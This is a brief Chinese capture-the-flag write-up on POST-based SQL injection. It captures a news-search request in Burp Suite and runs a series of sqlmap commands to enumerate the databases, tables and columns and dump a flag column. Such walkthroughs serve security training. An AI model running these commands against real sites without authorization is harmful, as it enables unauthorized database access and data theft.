sql注入之post注入

题目信息：

image.png

工具：bp,SQLmap
知识点：sql注入之post注入

打开题目，有一处搜索框，搜索新闻。考虑SQL注入。

image.png

随便输入一个2，用bp抓包，发现是post方式,然后Copy to file，将报文保存为txt文件。

image.png

保存为123.txt

image.png

然后用sqlmap一键注入（-r 表示从一个文件中载入HTTP请求，123.txt如果没有放到sqlmap目录就用绝对路径）

0x01:查找数据库
python sqlmap.py -r D:\SQLmap\123.txt --dbs

image.png

0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news

image.png

0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table

image.png

0x04:显示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g

image.png

参考：sqlmap用于sql注入语法